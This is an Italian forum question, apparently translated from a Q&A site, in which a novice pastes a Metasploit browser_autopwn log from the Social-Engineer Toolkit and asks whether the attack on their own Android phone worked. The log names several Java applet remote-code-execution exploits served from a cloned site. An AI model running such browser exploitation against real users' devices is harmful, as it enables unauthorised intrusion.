SET strumento autopwn tipo di sito web penetrazione [chiuso]

1

Ho provato a hackerare il mio secondo computer e telefono nella mia rete locale. Non sono molto esperto quindi, invece di scegliere le opzioni e i carichi utili specifici, ho appena premuto autopwn per usarli tutti all'istante. Quello che effettivamente ottengo ora è nel codice qui sotto, ma non sono sicuro se ho raggiunto qualcosa? Ho configurato IP, sito web clonato ecc. E questo è quello che vedo ora: E a proposito, quando ho chiuso tutto ho visto il messaggio "chiudere e pulire tutti gli exploit" vuol dire che il telefono è pulito comunque? o dovrei dargli un reset di fabbrica per sentirti al sicuro ora?

[*] Starting the payload handler...

[*] --- Done, found 21 exploit modules

[*] Using URL: http://0.0.0.0:8080/
[*]  Local IP: http://192.168.1.100:8080/
[*] Server started.
[*] 192.168.1.102    browser_autopwn - Handling '/'
[*] 192.168.1.102    browser_autopwn - Handling '/?sessid=QW5kcm9pZDp1bmRlZmluZWQ6dW5kZWZpbmVkOnVuZGVmaW5lZDp1bmRlZmluZWQ6ZW4tVVM6YXJtbGU6Q2hyb21lOjM5LjAuMjE3MS45Mzo%3d'
[*] 192.168.1.102    browser_autopwn - JavaScript Report: Android:undefined:undefined:undefined:undefined:en-US:armle:Chrome:39.0.2171.93:
[*] 192.168.1.102    browser_autopwn - Responding with 7 exploits
[*] 192.168.1.102    java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 192.168.1.102    java_atomicreferencearray - Generated jar to drop (5507 bytes).
[*] 192.168.1.102    java_jre17_jmxbean - handling request for /JWJcmkP
[*] 192.168.1.102    java_jre17_jmxbean - handling request for /JWJcmkP/
[*] 192.168.1.102    java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 192.168.1.102    java_atomicreferencearray - Generated jar to drop (5507 bytes).
[*] 192.168.1.102    java_jre17_jmxbean - handling request for /JWJcmkP
[*] 192.168.1.102    java_jre17_reflection_types - handling request for /LLBsdktmhchp
[*] 192.168.1.102    java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 192.168.1.102    java_atomicreferencearray - Generated jar to drop (5507 bytes).
[*] 192.168.1.102    java_jre17_jmxbean - handling request for /JWJcmkP/
[*] 192.168.1.102    java_jre17_reflection_types - handling request for /LLBsdktmhchp/
[*] 192.168.1.102    java_jre17_jmxbean - handling request for /JWJcmkP
[*] 192.168.1.102    java_jre17_reflection_types - handling request for /LLBsdktmhchp
[*] 192.168.1.102    java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 192.168.1.102    java_atomicreferencearray - Generated jar to drop (5507 bytes).
[*] 192.168.1.102    java_jre17_jmxbean - handling request for /JWJcmkP/
[*] 192.168.1.102    java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] 192.168.1.102    java_jre17_reflection_types - handling request for /LLBsdktmhchp/
[*] 192.168.1.102    java_jre17_reflection_types - handling request for /LLBsdktmhchp
[*] 192.168.1.102    java_jre17_jmxbean - handling request for /JWJcmkP
[*] 192.168.1.102    java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 192.168.1.102    java_atomicreferencearray - Generated jar to drop (5507 bytes).
[*] 192.168.1.102    java_jre17_reflection_types - handling request for /LLBsdktmhchp/
[*] 192.168.1.102    java_jre17_jmxbean - handling request for /JWJcmkP/
[*] 192.168.1.102    java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] 192.168.1.102    java_verifier_field_access - Sending Java Applet Field Bytecode Verifier Cache Remote Code Execution
[*] 192.168.1.102    java_verifier_field_access - Generated jar to drop (5507 bytes).
[*] 192.168.1.102    java_jre17_jmxbean - handling request for /JWJcmkP
[*] 192.168.1.102    java_jre17_reflection_types - handling request for /LLBsdktmhchp
[*] 192.168.1.102    java_atomicreferencearray - Sending Java AtomicReferenceArray Type Violation Vulnerability
[*] 192.168.1.102    java_atomicreferencearray - Generated jar to drop (5507 bytes).
[*] 192.168.1.102    java_jre17_reflection_types - handling request for /LLBsdktmhchp/
[*] 192.168.1.102    java_jre17_jmxbean - handling request for /JWJcmkP/
[*] 192.168.1.102    java_verifier_field_access - Sending Java Applet Field Bytecode Verifier Cache Remote Code Execution
[*] 192.168.1.102    java_verifier_field_access - Generated jar to drop (5507 bytes).
[*] 192.168.1.102    java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
[*] 192.168.1.102    java_jre17_provider_skeleton - handling request for /DkeFLS
[*] 192.168.1.102    java_jre17_provider_skeleton - handling request for /DkeFLS/

msf auxiliary(browser_autopwn) >
    
posta Terrorizer 14.01.2015 - 00:32
fonte

0 risposte